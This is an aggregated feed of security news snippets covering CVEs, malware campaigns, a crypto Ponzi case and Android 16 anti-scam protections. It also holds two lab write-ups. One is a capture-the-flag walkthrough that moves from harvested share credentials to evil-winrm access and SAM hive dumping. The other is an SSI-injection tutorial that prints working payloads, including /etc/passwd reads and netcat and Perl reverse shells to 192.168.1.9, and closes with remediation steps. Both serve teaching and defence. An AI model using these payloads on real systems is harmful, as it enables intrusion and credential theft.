Exploits Confirm Attack Feasibility – The existence of an exploit for CVE-2025-21415 highlights the importance of rapid vulnerability mitigation. Industry Transparency in Security Disclosures – Microsoft’s open disclosure of vulnerabilities sets a precedent for cloud security providers. Best Practices for Organizations Using Azure AI and Microsoft Services While Microsoft has addressed these issues, organizations should remain proactive in their cybersecurity approach. Recommended actions include: Monitoring Security Updates: Stay informed about Microsoft security advisories and apply patches promptly. Implementing Privileged Access Management (PAM): Restrict user permissions to minimize unauthorized privilege escalation risks. Adopting a Zero-Trust Security Model: Enforce strict access controls and authentication measures. Conducting Regular Security Audits: Identify and remediate potential vulnerabilities in cloud environments. Using Continuous Monitoring Tools: Detect abnormal activities that may indicate security threats. Industry Implications and the Future of Cloud Security The swift mitigation of these vulnerabilities highlights Microsoft’s commitment to cloud security. However, it also underlines the broader cybersecurity challenges associated with cloud-based services. As AI-driven applications become more prevalent, businesses must: Adopt strong security frameworks to protect their digital infrastructure. Enhance real-time threat detection mechanisms. Continuously refine access control policies to mitigate privilege escalation risks. Organizations relying on Azure AI Face Service and Microsoft authentication systems should stay vigilant, monitor security advisories, and ensure compliance with security best practices to safeguard their digital assets. Conclusion The discovery and mitigation of CVE-2025-21415 and CVE-2025-21396 highlight the ever-present cybersecurity risks in cloud-based AI services. While Microsoft has proactively addressed these vulnerabilities, organizations must continue prioritizing cybersecurity to prevent potential exploitation. Staying informed, implementing best practices, and fostering a culture of cybersecurity awareness will be crucial in mitigating future risks. Source: https://www.mycert.org.my/portal/advisory?id=MA-1259.022025 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-21396 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-21415 The post CVE-2025-21415 & CVE-2025-21396: Microsoft Addresses Critical Security Risks appeared first on Cyble.

by CYBLE

Cybersecurity researchers have shed light on a new Golang-based backdoor that uses Telegram as a mechanism for command-and-control (C2) communications. Netskope Threat Labs, which detailed the functions of the malware, described it as possibly of Russian origin. ""The malware is compiled in Golang and once executed it acts like a backdoor,"" security researcher Leandro Fróes said in an analysis

by The Hacker News

Trojanized game PirateFi lasted four days on Steam.

by Kaspersky

We’re proud to collaborate with CyberPeace Institute by powering its latest initiative, the CyberPeace Tracer, a platform that enables civil society organizations to proactively report cyber threats.

by Cloudflare

Microsoft announced the deprecation of the Location History feature from Windows, which let applications like the Cortana virtual assistant to fetch location history of the device. [...]

by BleepingComputer

SOC challenges like alert fatigue, skill shortages and slow response impact cybersecurity. AI-driven solutions enhance SOC efficiency, automation…

by Hackread

A newly identified malware family abuses the Outlook mail service for communication, via the Microsoft Graph API. The post New FinalDraft Malware Spotted in Espionage Campaign appeared first on SecurityWeek.

by SecurityWeek

Discover how Darktrace detected and responded to cyberattacks using Living-off-the-Land (LOTL) tactics to exploit trusted services and tools on customer networks.

by Darktrace

Authors: Martin Kraemer, Security Awareness Advocate at KnowBe4 and James Dyer, Threat Intelligence Lead at KnowBe4 This Valentine’s Day, Cupid wasn’t the only one taking aim. Our Threat Research team noted a 34.8% increase on Valentine-related threat traffic in comparison to February of 2024.

by KnowBe4

Two Estonian nationals plead guilty to a $577M cryptocurrency Ponzi scheme through HashFlare, defrauding hundreds of thousands globally.…

by Hackread

Social media platform X (formerly Twitter) is now blocking links to ""Signal.me,"" a URL used by the Signal encrypted messaging to share your account info with another person. [...]

by BleepingComputer

In January 2025, Microsoft disclosed and patched a critical privilege escalation vulnerability affecting Microsoft’s Active Directory Domain Services (AD DS) as part of Patch Tuesday. Although CVE-2025-21293 was discovered in September 2024, the public release of the proof-of-concept (PoC) exploit has heightened concerns, and adversaries were observed to exploit the vulnerability in the wild. Given the widespread reliance on Active Directory for authentication and authorization in corporate networks, organizations are strongly advised to apply the latest security patches promptly.

by Picus Security

For the latest discoveries in cyber research for the week of 17th February, please download our Threat Intelligence Bulletin. TOP ATTACKS AND BREACHES SimonMed Imaging, one of the largest diagnostic imaging companies in the US, has been breached by Medusa ransomware group, resulting in the theft of over 212 GB of sensitive data from its […] The post 17th February – Threat Intelligence Report appeared first on Check Point Research.

by Check Point Research

Overview Cyble’s vulnerability intelligence report to clients last week highlighted flaws in Ivanti, Apple, Fortinet, and SonicWall products. The report from Cyble Research and Intelligence Labs (CRIL) examined 22 vulnerabilities and dark web exploits, including some with significant internet-facing exposures. Microsoft had a relatively quiet Patch Tuesday, with the most noteworthy fixes being for two actively exploited zero-day vulnerabilities (CVE-2025-21391, a Windows Storage Elevation of Privilege Vulnerability, and CVE-2025-21418, a Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability), but other IT vendors also issued updates on the second Tuesday of the month. Both Microsoft vulnerabilities were added to CISA’s Known Exploited Vulnerabilities catalog. Cyble’s vulnerability intelligence unit highlighted five new vulnerabilities as meriting high-priority attention by security teams, plus a month-old vulnerability at elevated risk of attack. The Top IT Vulnerabilities Three of the vulnerabilities highlighted by Cyble (CVE-2025-22467, CVE-2024-38657, and CVE-2024-10644) affect Ivanti Connect Secure (ICS), a secure remote access solution, and Ivanti Policy Secure (IPS), a network access control (NAC) solution. CVE-2025-22467 is a stack-based buffer overflow vulnerability in ICS that could allow remote authenticated attackers with low privileges to execute code.  CVE-2024-10644 is a code injection vulnerability that could allow remote code execution in ICS and IPS by remote authenticated attackers. CVE-2024-38657 is an external control of a file name vulnerability that could enable remote authenticated attackers to perform arbitrary file writing in ICS and IPS. CVE-2025-24200 is a zero-day authorization vulnerability affecting multiple generations of iPhones and iPads that can be exploited to disable Apple''s USB Restricted Mode. Apple stated that it is aware of a report indicating that the issue may have been exploited in ""an extremely sophisticated attack against specific targeted individuals.” CVE-2025-24472 is an authentication bypass using an alternate path or channel vulnerability affecting FortiOS 7.0.0 through 7.0.16 and FortiProxy 7.2.0 through 7.2.12, 7.0.0 through 7.0.19, and may allow a remote attacker to gain super-admin privileges via crafted CSF proxy requests. Fortinet customers who previously upgraded for the CVE-2024-55591 vulnerability are protected from the new issue. CVE-2024-53704 is an improper authentication vulnerability in the SSLVPN authentication mechanism of SonicWall NSv devices and certain other SonicWall firewall products that could allow a remote attacker to bypass authentication and gain unauthorized access to secure networks. Cyble noted that the recent public release of exploit code for the vulnerability significantly increases the risk of exploitation attempts, making immediate patching essential. Cyble noted that a large number of internet-facing devices may be vulnerable (image below). Cyble Recommendations To protect against these vulnerabilities and exploits, Cyble recommends that organizations implement the following best practices: Regularly update all software and hardware systems with the latest patches from official vendors. Develop a comprehensive patch management strategy that includes inventory management, patch assessment, testing, deployment, and verification. Automate the process where possible to ensure consistency and efficiency. Divide your network into distinct segments to isolate critical assets from less secure areas. Use firewalls, VLANs, and access controls to limit access and reduce the attack surface exposed to potential threats. Create and maintain an incident response plan that outlines procedures for detecting, responding to, and recovering from security incidents, including ransomware-resistant backups. Regularly test and update the plan to ensure its effectiveness and alignment with current threats. Implement comprehensive monitoring and logging solutions to detect and analyze suspicious activities. Use SIEM (Security Information and Event Management) systems to aggregate and correlate logs for real-time threat detection and response. Subscribe to security advisories and alerts from official vendors, CERTs, and other authoritative sources. Regularly review and assess the impact of these alerts on your systems and take appropriate actions. Conduct regular vulnerability assessment and penetration testing (VAPT) exercises to identify and remediate vulnerabilities in your systems. Complement these exercises with periodic security audits to ensure compliance with security policies and standards. Conclusion Security teams should prioritize actively exploited vulnerabilities—and those at high risk of exploitation—when determining their patching efforts. They should also consider other indicators of risk, such as web exposure and data and application sensitivity. Implementing strong security practices is essential for protecting sensitive data and maintaining system integrity. A comprehensive threat intelligence solution like Cyble can monitor for threats, exposures, and leaks specific to your environment, allowing you to respond quickly to events and prevent them from becoming wider incidents. To access full IT vulnerability and other reports from Cyble, click here. The post IT Vulnerability Report: Ivanti, Apple Fixes Urged by Cyble appeared first on Cyble.

by CYBLE

ExpressVPN has reimplemented its Lightway VPN protocol in Rust, replacing the original C-based implementation. The move aims to enhance security, improve performance, and make future expansions more efficient. To validate the security of the rewritten protocol, ExpressVPN commissioned independent audits by Cure53 and Praetorian, both of which confirmed the integrity of the new implementation. A … The post ExpressVPN Rewrites Lightway VPN Protocol in Rust for Security appeared first on CyberInsider.

by Cyber Insider

How meme cryptocurrencies work (TRUMP, MELANIA, and others), and how not to get duped.

by Kaspersky

by ComputerWeekly

A new variant of the XCSSET macOS modular malware has emerged in attacks that target users'' sensitive information, including digital wallets and data from the legitimate Notes app. [...]

by BleepingComputer

Two Estonian nationals have admitted their roles in planning a massive cryptocurrency Ponzi scheme that defrauded hundreds of thousands of investors worldwide, including numerous individuals in the United States. Sergei Potapenko and Ivan Turõgin, both 40, pleaded guilty to charges related to their operation of HashFlare, a cryptocurrency fraud mining service. As part of their plea agreement, the defendants have committed to forfeit assets valued at more than $400 million, marking a significant victory for law enforcement in tackling the growing threat of cryptocurrency fraud. The Scheme: A Deceptive Cryptocurrency Mining Operation Between 2015 and 2019, Potapenko and Turõgin ran HashFlare, selling customers contracts that promised a share of the cryptocurrency mined by the service. Cryptocurrency mining—the process of using computer systems to generate digital currency such as Bitcoin—was the front for their fraudulent operation. However, instead of fulfilling these promises, the defendants lacked the necessary computing power to perform the mining they claimed. Instead, they fabricated data displayed on HashFlare’s web-based dashboard, misleading customers into believing they were earning returns on their investments. Despite not having the capacity to mine the cryptocurrencies as advertised, the scheme was remarkably profitable, generating more than $577 million in sales. Potapenko and Turõgin funneled the proceeds into lavish assets, purchasing real estate, luxury vehicles, and maintaining various cryptocurrency and investment accounts. Massive Losses for Victims Worldwide The impact of the scheme was devastating, with hundreds of thousands of victims losing their hard-earned money. The victims, who were drawn into the scheme by promises of high returns from cryptocurrency mining, were left with nothing as the defendants’ fraudulent activities continued unchecked for years. As a result, the forfeited assets—valued at over $400 million—will now be made available through a remission process, which is expected to help compensate the defrauded investors. The details of the remission process will be announced at a later date. Potapenko and Turõgin each pleaded guilty to one count of conspiracy to commit wire fraud. Under U.S. law, they each face up to 20 years in prison. However, the final sentence will be determined by a federal district court judge, who will consider various factors, including the U.S. Sentencing Guidelines, before imposing any penalties. Sentencing is scheduled for May 8, 2025. International Efforts in Combating Cybercrime This case highlights the increasingly global nature of cryptocurrency fraud and the importance of international cooperation in combating cybercrime. The Justice Department credited multiple agencies for their significant roles in bringing the defendants to justice. The Cybercrime Bureau of the Estonian Police and Border Guard played a critical role in gathering evidence, while the Estonian Prosecutor General and Ministry of Justice and Digital Affairs were instrumental in facilitating the extradition process. Additionally, the Justice Department’s Office of International Affairs provided crucial assistance in ensuring the defendants were brought to the United States for prosecution. Antoinette T. Bacon, Supervisory Official of the Justice Department’s Criminal Division, expressed the department''s commitment to combating cryptocurrency fraud. “This case underscores the importance of international collaboration to hold individuals accountable for exploiting the digital economy for fraudulent purposes.” FBI’s Key Role in the Investigation The Federal Bureau of Investigation (FBI) played a pivotal role in the investigation, with its Seattle Field Office leading the charge. Chad Yarbrough, Assistant Director of the FBI’s Criminal Investigative Division, stressed the importance of tackling cryptocurrency fraud schemes, stating, “The FBI will continue to prioritize the investigation of cybercrime and cryptocurrency fraud that targets individuals and organizations worldwide.” Mike Herrington, Special Agent in Charge of the FBI’s Seattle Field Office, further emphasized the FBI’s commitment to addressing fraud in emerging technologies. “This case serves as a stark reminder that even those operating in the digital realm are not beyond the reach of the law.” Cryptocurrency Fraud: A Growing Concern The guilty pleas of Potapenko and Turõgin warn of the dangers of cryptocurrency-related scams, which have become increasingly prevalent in recent years. As the digital currency market grows, criminals have more opportunities to exploit unsuspecting individuals. Cryptocurrency mining services, once viewed as legitimate investment opportunities, have become a popular front for fraudulent schemes promising large returns. This case is one of many that highlights the need for greater consumer protection and regulatory oversight in the cryptocurrency industry. As digital currencies continue to rise in popularity, both regulators and consumers must remain vigilant against fraudulent schemes designed to take advantage of the unregulated space.

by The Cyber Express

Microsoft has announced the deprecation and eventual removal of the Location History feature in Windows, which allowed applications, including Cortana, to access 24 hours of stored device location data. This change, set to take effect this month, will remove the corresponding settings from the Privacy & Security > Location page in Windows Settings, and location … The post Microsoft to Deprecate Location History Feature in Windows appeared first on CyberInsider.

by Cyber Insider

Pro-Russia collective NoName057(16) launched DDoS attacks on Italian sites, targeting airports, the Transport Authority, major ports, and banks. The pro-Russia hacker group NoName057(16) launched a new wave of DDoS attacks this morning against multiple Italian entities. The group targeted the websites of Linate and Malpensa airports, the Transport Authority, the bank Intesa San Paolo, and […]

by Security Affairs

Google is working to enhance the security of its mobile operating system, focusing on preventing scammers from exploiting certain phone features during calls. One key feature of Android 16 aims to block actions like sideloading apps or enabling accessibility access during an active phone call, both of which are commonly used by scammers to gain control of victims’ devices.  The growing prevalence of online scams, fueled by advanced tools like AI-driven speech synthesis, has put many users at risk. Scammers are increasingly relying on psychological manipulation to convince unsuspecting individuals to share personal information, send money, or install harmful apps. This has prompted Google to develop a new security feature for Android 16 to make it harder for scammers to succeed.  Through this update, Android 16 prevents users from changing certain sensitive settings while they’re on a call. Two of the most targeted settings by scammers are sideloading apps and enabling accessibility access. Sideloading, which allows apps to install other apps from sources outside the Google Play Store, is often used to distribute malware. Accessibility access, on the other hand, gives apps the power to read a user’s screen and perform actions on their behalf, essentially handing over control of the device.  How the Feature Works in Android 16 Beta 2  Google has already rolled out these in-call protections in Android 16 Beta 2, offering users a preview of the upcoming feature. During an active phone call, Android will now block any attempts to sideload apps or grant accessibility access. This is particularly important since scammers typically try to walk victims through the sideloading process over the phone. A closer look at Android 16 Beta 2 reveals a warning message that appears when users attempt to enable the sideloading feature during a call. The message advises users that this action is commonly requested by scammers and urges caution when guided by unknown callers. This alert could serve as a red flag, prompting users to reconsider the legitimacy of the call. Furthermore, sideloading permissions are disabled by default, adding another layer of protection.  Added Protection Against Malicious Permissions  Even if a victim has already enabled sideloading or downloaded a malicious app, Android 16 goes further by blocking the granting of accessibility access during calls. This step is crucial because, once an app has this level of control, it can take over the phone and compromise the user’s privacy and security. Malicious apps that gain access to these permissions can perform harmful actions on behalf of the user, including stealing sensitive data or even locking the user out of their device. By preventing these changes during phone calls, Google aims to thwart scammers who attempt to install malware or access critical permissions during a conversation.  The Growing Threat of Online Scams  As online scams become more sophisticated, scammers are increasingly relying on phone calls to manipulate and defraud individuals. These scams often target older adults or those unfamiliar with digital security practices. The psychological tactics used by scammers—such as creating a sense of urgency or fear—can be highly effective in tricking victims into complying with their demands. Scammers might ask victims to install apps that promise to help with a supposed issue, such as a fraudulent tech support call. Once the app is installed, the scammer gains access to the victim''s device, potentially leading to further exploitation.  With the introduction of these new security features in Android 16, Google is taking a proactive stance against such tactics. By making it harder for users to sideload apps or grant dangerous permissions during phone calls, Android hopes to reduce the effectiveness of these scams. Conclusion  The security measures in Android 16 Beta 2 are set to be part of the full Android 16 release later in 2025, building on previous updates like Android 15''s Enhanced Confirmation Mode. As scammers become more sophisticated, these new features—such as blocking sideloading permissions and restricting accessibility during calls—represent a vital step in Google''s ongoing effort to protect users. By introducing these protective layers, Android 16 not only strengthens defenses against online scams but also empowers users to stay safe. 

by The Cyber Express

Researchers warn that the whoAMI attack lets attackers publish an AMI with a specific name to execute code in an AWS account. Cybersecurity researchers at Datadog Security Labs devised a new name confusion attack technique, called whoAMI, that allows threat actors to execute arbitrary code execution within the Amazon Web Services (AWS) account by publishing […]

by Security Affairs

Enumeration Rust Scan PORT STATE SERVICE REASON VERSION 53/tcp open domain syn-ack Simple DNS Plus 88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2025-02-15 11:11:20Z) 135/tcp open msrpc syn-ack Microsoft Windows RPC 139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn 389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=CICADA-DC.cicada.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb | Issuer: commonName=CICADA-DC-CA/domainComponent=cicada | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2024-08-22T20:24:16 | Not valid after: 2025-08-22T20:24:16 | MD5: 9ec51a2340efb5b83d2c39d8447ddb65 | SHA-1: 2c936d7bcfd811b99f711a5a155d88d34a52157a 445/tcp open microsoft-ds? syn-ack 464/tcp open kpasswd5? syn-ack 593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name) |_ssl-date: TLS randomness does not represent time | ssl-cert: Subject: commonName=CICADA-DC.cicada.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb | Issuer: commonName=CICADA-DC-CA/domainComponent=cicada | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2024-08-22T20:24:16 | Not valid after: 2025-08-22T20:24:16 | MD5: 9ec51a2340efb5b83d2c39d8447ddb65 | SHA-1: 2c936d7bcfd811b99f711a5a155d88d34a52157a 3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=CICADA-DC.cicada.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb 3269/tcp open ssl/ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name) |_ssl-date: TLS randomness does not represent time | ssl-cert: Subject: commonName=CICADA-DC.cicada.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb 5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 63150/tcp open msrpc syn-ack Microsoft Windows RPC Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows The open ports suggest that the target is a Windows Active Directory (AD) server with SMB, Kerberos, LDAP, and WinRM enabled .Since Kerberos (88, 464), LDAP (389, 636), Global Catalog (3268, 3269), DNS (53), and SMB (445) are open, this system is almost certainly a Windows Active Directory Domain Controller. SMB CLient Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share DEV Disk HR Disk IPC$ IPC Remote IPC NETLOGON Disk Logon server share SYSVOL Disk Logon server share Tried Accessing DEV and HR shares smbclient \\\\cicada.htb\\DEV -N Try ""help"" to get a list of possible commands. smb: \> ls NT_STATUS_ACCESS_DENIED listing \* Lets try using it in HR share smbclient \\\\cicada.htb\\HR -N Try ""help"" to get a list of possible commands. smb: \> ls . D 0 Thu Mar 14 17:59:09 2024 .. D 0 Thu Mar 14 17:51:29 2024 Notice from HR.txt A 1266 Wed Aug 28 23:01:48 2024 Got something lets get that file and see what is inside it . We got password from the file Cicada$M6Corpb*@Lp#nZp!8 Tried brute forcing with common credentials and password obtained. Found a bunch of users and michael.wrightson gave some results We got a username and password - david.orelious:aRt$Lp#7t*VQ!3 smbclient \\\\cicada.htb\\DEV -U ''david.orelious'' Password for [WORKGROUP\david.orelious]: Try ""help"" to get a list of possible commands. smb: \> ls . D 0 Thu Mar 14 18:01:39 2024 .. D 0 Thu Mar 14 17:51:29 2024 Backup_script.ps1 A 601 Wed Aug 28 22:58:22 2024 There is a file when I opened it again got a username and password - emily.oscars : Q!3@Lp#M6b*7t*Vt . Tried this combination with smb client and smb map. Since this is an Active Directory machine, I tried WinRM Access with the credentials evil-winrm -i cicada.htb -u ''emily.oscars'' -p ''Q!3@Lp#M6b*7t*Vt'' *Evil-WinRM* PS C:\Users> ls Directory: C:\Users Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 8/26/2024 1:10 PM Administrator d----- 8/22/2024 2:22 PM emily.oscars.CICADA d-r--- 3/14/2024 3:45 AM Public User.txt We got user flag in the emily.oscars.CICADA>Desktop>user.txt There is a directory name Administrator But I don’t have access to Privilege escalation need to be done root.txt creating a directory named Temp in the C:\ drive and then using the Windows reg save command to dump the SAM (Security Account Manager) and SYSTEM registry hives into C:\Temp. The SAM hive contains password hashes of local user accounts, while the SYSTEM hive holds encryption keys needed to decrypt those hashes. This is commonly used in privilege escalation attacks to extract credentials and perform Pass-the-Hash (PTH) attacks or offline cracking using tools like Mimikatz or Hashcat. However, executing this requires SYSTEM-level privileges, and without them, you’ll likely get an “Access Denied” error. download sam download system Using pypykatz to extract password hashes from the dumped SAM and SYSTEM registry hives we found hash value for Adminstator Lets connect using the username and password

by HACKLIDO

A list of topics we covered in the week of February 10 to February 16 of 2025

by Malwarebytes Labs

The Blink Mini 2 is a feature-rich security camera that you can get for $20. An extra $10 gets you a waterproof adapter that makes the deal that much sweeter.

by ZDNET Security

In a late panel discussion on Saturday at the Munich Security Conference, Kaupo Rosin protested the use of the word which has been applied to a range of hostile activities that are deemed to be deniable or below the threshold justifying an armed response.

by The Record

Server Side Includes (SSI) provide developers a smooth method to dynamically build web pages in web development contexts. SSI provides developers with a tool to embed dynamic elements into HTML documents through a system that does not require advanced knowledge of server and client programming. SSIs serve both performance optimization and serve as risks for exploitation whenever developers fail in their configuration. This piece of content provides a dual understanding of SSI as it affects developers and attackers. This article introduces the analysis of typical SSI commands by explaining their unique syntax along with discussing manipulation techniques which can result in undesired consequences for attackers. What Is SSI, Really? The server processes HTML comments containing embedded special directives through SSI. Server directives such as <!--#include--> and <!--#exec--> inform the server to carry out instructions before generating the HTML content which will be sent to the client. The dual functionality of this design architecture enables a browser to interpret unprocessed SSI by viewing them as comments when SSI processing fails. Lab To access the lab, we will be using bee box and intentionally vulnerable application that we can runs applications like bwapp on vmware. You can download the vm from here and feel free to use google and youtube. I have tried other methods like docker, but SSI injection lab had some errors and I personally find installing bee box on vmware to be the easiest way to access this lab. Breaking Down the SSI Directives Let’s walk through some practical examples and explain what each command does, why the syntax looks a bit “off,” and what makes it a potential vector for attack when exploited. 1. Viewing System Files <!--#exec cmd=""cat /etc/passwd""--> Through its exec directive this command instructs the server to execute the shell command cat /etc/passwd. The user account information lies within this file on Unix-like systems. An attacker who succeeds in SSI injection could exploit this vulnerability to access important system data even though an ideal secure setup should not disclose such information publicly. The directive embeds its contents inside an HTML comment which appears to be there for documentation purposes. The browser ignores HTML comments yet when configured to handle SSI the server performs command execution. The specific structure of SSI allows it to appear alongside normal HTML coding. Screenshot: 2. Listing Directory Contents <!--#exec cmd=""ls"" -- > Here, the exec directive executes the ls command which lists down all the files and directories present in the current working directory. It is just one simple way to know how many files are available on the server. Simple noticing of the extra space and the way is formatted via closing tag (-- > instead of the standard -->). Occasionally, they modify the syntax to evade simple pattern-based firewalls on websites. Such tiny glitches could help enter undetected while being properly interpreted by a vulnerable server. Screenshot: 3. Echoing Environment Variables SSI isn’t just a command execution tech–it could even be used for information disclosure through environment variables. Consider these examples: a. Document Name <!--#echo var=""DOCUMENT_NAME"" -- > This directive outputs the value of the DOCUMENT_NAME environment variable, usually, the current file’s name. A useful operation to check that SSI is working and obtain metadata regarding the file being processed Screenshot: b. Last Modified Date <!--#echo Var=""LAST_MODIFIED"" --> Here, echo retrieves LAST_MODIFIED environment variable showing when the file was last modified. This kind of information can both a contributions, and a malicious individuals trace out the file’s life and the timeline of changes. Screenshot: c. Document URI <!--#echo var=""DOCUMENT_URI"" -- > This command just echoes the DOCUMENT_URI, which is the path in the server where lies the file. It is another method that helps verify the server’s internal routing and naming schemes. Screenshot: 4. Printing the Entire Environment <!--#printenv --> The printenv directive equals all environment variables present in the server. For an attacker this could be a treasure trove of information as this commands returns all essential information about the server configurations down to potential secrets that might be stored in environment variables. Screenshot: 5. Opening a Reverse Shell with Netcat <!--#exec cmd=""nc 192.168.1.9 443 -e /bin/sh"" --> The critical issue arises with SSI at this point. The script makes an attempt to create a thus named shell back to a remote server at 192.168.1.9 port 443 by using the Netcat (nc) utility. The command reaches an unauthorized attacker-controlled server located at 192.168.1.9:443 to establish a connection that connects to the system shell located at /bin/sh. The server enables interactive remote access to the attacker if the command executes successfully. Important Note: The command shows its output through the website instead of directing it to the Netcat listener. When the web server captures STDOUT from the script it displays the output in the HTML response to users. Multiple interactive reverse shell sessions require all streams of input and output to receive proper redirection. After executing commands like pwd, whoami, and ls through the shell, you may see outputs like: pwd /var/www/bWAPP whoami www-data And from the Netcat listener: /var/www/bWAPP via  ❯ sudo nc -lvnp 443 Listening on 0.0.0.0 443 ls Connection received on 192.168.1.7 48389 ls whoami pwd 6. Crafting a Perl Reverse Shell Hackers sometimes select Perl because it provides superior options for changing reverse shell functionality. Consider this payload: <!--#exec cmd=""perl -e ''use Socket;$i=\""192.168.1.9\"";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\""tcp\""));connect(S,sockaddr_in($p,inet_aton($i)));while(<S>){system($_);}''"" --> The script opens a TCP connection to the attacker’s specified IP and port while executing commands entered into the connection on the server system. The script produces output which may display on the website because it directs information to STDOUT. The Fix: Redirecting I/O Correctly (failed attempt) Obtaining complete Netcat-based interactive shell functionality requires you to specifically redirect the standard input/output/error streams. <!--#exec cmd=""perl -e ''use Socket;$i=\""192.168.1.9\"";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\""tcp\""));connect(S,sockaddr_in($p,inet_aton($i)));open(STDIN,\""<&S\"");open(STDOUT,\"">&S\"");open(STDERR,\"">&S\"");exec(\""/bin/sh -i\"");''"" --> Key Changes: open(STDIN,""<&S""); open(STDOUT,"">&S""); open(STDERR,"">&S""); The commands redirect all streams of inputs and outputs and errors to connect with the Netcat service. The output direction flows directly from your listener instead of returning to the web page thanks to this redirection method which makes the session fully interactive. But this is real life, and not everything goes as expected, and this breaks the web application and our payload does not execute as expected. Screenshot of Failed attempt: 7. Displaying the Local Date <!--#echo var=""DATE_LOCAL"" --> The single command displays the local date together with the current time on the server’s system. Server time settings knowledge assists attackers to synchronize their activities and gain better understanding of the working environment. Screenshot: Why Does the Syntax Look So Weird? At first glance, SSI directives can seem like a jumble of characters. There’s a reason for this: HTML Comment Wrapping: SSIs embed their directives using HTML comment syntax where the server recognizes <!--#command--> as the starting syntax. This programming structure has been implemented to make sure the browser skips SSI when the server does not read them. Security Evasion: The attackers exploit security weaknesses by adding spaces or changing letter cases to evade protection measures on servers. Technical jargon contributes to this unusual syntax format because attackers use such irregular formatting against servers that lack proper security measures or adequate sanitization systems. Dual-Purpose Nature: The directives must maintain two functions by remaining valid HTML for browsers to ignore them while functioning as interpretable commands for servers. A dual-purpose structure creates complicated syntax which functions between server commands and HTML standards. Remediation: Securing Your Server Against SSI Vulnerabilities Server-Side Includes (SSI) offer a convenient way to dynamically include content, but they also open up potential security risks if not properly managed. In Apache, SSI is often configured through specific options and file extensions—typically, files with the .shtml extension trigger the server to parse SSI directives embedded in HTML comments. If your site doesn’t need SSI, or if you need to secure it against injection attacks, the following steps will help you disable or safely configure SSI on your web server. In this blog we will be having a look on how to prevent this vulnerability in apache and in IIS servers. Disabling SSI in Apache Method 1: Modify the Main Configuration File Locate Your Configuration File: Apache configuration files exist mainly in two main locations on different systems: /etc/httpd/conf/httpd.conf (CentOS/RedHat) /etc/apache2/apache2.conf (Ubuntu/Debian) Edit the File: Your website needs you to open its configuration file using a text editor where you should find the <Directory> block. Disable SSI Processing: Add or update the directive: Options -Includes Processing SSI directives in that directory becomes disabled by adding the instruction. Restart Apache: Execute the configuration changes through an Apache service restart. sudo systemctl restart apache2 # or sudo service httpd restart Method 2: Use a .htaccess File Assume there is a directory at /var/www/html/insecure-dir which SSI is on for. You can disable this by following the below detailed steps. Navigate to the Directory: cd /var/www/html/insecure-dir Make a new or edit the .htaccess file: nano .htaccess Add the Following Line: Options -Includes Save and Exit: With this change, Apache will not execute PROCESS directive any more in /insecure-dir. Method 3: Remove SSI Handlers Delete the File Extensions Linked to SSI: If the SSI is turned on merely because of file extensions like .shtml, then add the following line in Apache configuration or .htaccess file: RemoveHandler .shtml This prevents Apache from server-side includes in files of those types. Disabling SSI in IIS Method 1: Using IIS Manager Open IIS Manager: Choose your website from the left-hand tab. Modify Handler Mappings: In the middle panel, double-click Handler Mappings. Go to find any handlers connected to Server-Side Includes, select it with Right-click + “Remove” or Left-Click + “Disable”. Method 2: Edit the applicationHost.config File Locate the File: The applicationHost.config file are commonly found at: C:\Windows\System32\inetsrv\config\applicationHost.config. Disable SSI Globally: Open the file as administrator, and within the <system.webServer> section, open and add or: <serverSideInclude ssiExecDisable=""true"" /> Save the file and then restart IIS in order to have changes applied. Method 3: Disable Directory Browsing Turn Off Directory Browsing: In IIS Manager, offuscia double-click Directory Browsing for your site, set it to Off. This reduces the exposure of the SSI enabled files. Conclusion Server Side Includes serves as an instrument that speeds up web page development for dynamic content. Functional capabilities of Server Side Includes provide both advantages and opportunities for attackers when security measures are absent. SSI directives allow us to see both the practical benefit and potential dangers of this technology after learning their operation through exploring single VARIABLE echoes up to advanced interactive shell commands. The lesson for developers should focus on both very strict management of user-controlled input along with avoiding harmful SSI configurations. Web infrastructure protection relies on complete understanding of every element in a technology including Server Side Includes, even though SSI was developed long ago. Taking proactive steps allows users to preserve dynamic content benefits together with secure web application operation.

by HACKLIDO

Russia-linked group Storm-2372 used the device code phishing technique since Aug 2024 to steal login tokens from governments, NGOs, and industries. Microsoft Threat Intelligence researchers warn that threat actor Storm-2372, likely linked to Russia, has been targeting governments, NGOs, and various industries across multiple regions since August 2024. The attackers employ a phishing technique called […]

by Security Affairs

Google is working on a new security feature for Android that blocks device owners from changing sensitive settings when a phone call is in progress. Specifically, the in-call anti-scammer protections include preventing users from turning on settings to install apps from unknown sources and granting accessibility access. The development was first reported by Android Authority. Users who attempt

by The Hacker News

